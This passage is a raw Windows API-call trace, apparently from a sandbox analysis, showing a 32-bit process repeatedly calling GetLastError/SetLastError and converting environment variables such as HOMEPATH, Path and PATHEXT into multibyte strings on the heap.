GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x1c [0180.260] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x20) returned 0x641550 [0180.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x14) returned 0x6414d0 [0180.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x6414d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x20 [0180.261] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x24) returned 0x641550 [0180.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd) returned 0x63e4d0 [0180.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x63e4d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x24 [0180.262] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x28) returned 0x641550 [0180.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0180.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x25) returned 0x63a8e8 [0180.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x63a8e8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x28 [0180.264] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x2c) returned 0x641550 [0180.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0180.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x39) returned 0x6355f8 [0180.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x6355f8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.264] SetLastError (dwErrCode=0x0) [0180.264] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] GetLastError () returned 0x0 [0180.265] SetLastError (dwErrCode=0x0) [0180.265] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x2c [0180.265] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x30) returned 0x641550 [0180.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0180.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x641588 [0180.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x641588, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.266] SetLastError (dwErrCode=0x0) [0180.266] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.358] GetLastError () returned 0x0 [0180.358] SetLastError (dwErrCode=0x0) [0180.359] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641550) returned 0x30 [0180.359] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641550, Size=0x34) returned 0x6415a8 [0180.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x17) returned 0x641550 [0180.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x641550, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.359] SetLastError (dwErrCode=0x0) [0180.359] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] GetLastError () returned 0x0 [0180.360] SetLastError (dwErrCode=0x0) [0180.360] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6415a8) returned 0x34 [0180.360] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6415a8, Size=0x38) returned 0x6415a8 [0180.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe) returned 0x63e4e8 [0180.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x63e4e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.361] SetLastError (dwErrCode=0x0) [0180.361] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.362] SetLastError (dwErrCode=0x0) [0180.362] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6415a8) returned 0x38 [0180.363] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6415a8, Size=0x3c) returned 0x6415a8 [0180.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0180.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x69) returned 0x6415f0 [0180.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x6415f0, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.363] GetLastError () returned 0x0 [0180.363] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.364] SetLastError (dwErrCode=0x0) [0180.364] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.365] SetLastError (dwErrCode=0x0) [0180.365] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6415a8) returned 0x3c [0180.366] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6415a8, Size=0x40) returned 0x6415a8 [0180.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0180.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x635640 [0180.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x635640, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.366] SetLastError (dwErrCode=0x0) [0180.366] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] SetLastError (dwErrCode=0x0) [0180.367] GetLastError () returned 0x0 [0180.367] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6415a8) returned 0x40 [0180.367] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6415a8, Size=0x44) returned 0x641668 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1b) returned 0x63ece0 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x63ece0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0180.367] GetLastError () returned 0x0 [0180.367] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x44 [0180.367] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, Size=0x48) returned 0x641668 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1d) returned 0x63ed08 [0180.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x63ed08, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0180.368] GetLastError () returned 0x0 [0180.368] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641668) returned 0x48 [0180.368] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641668, 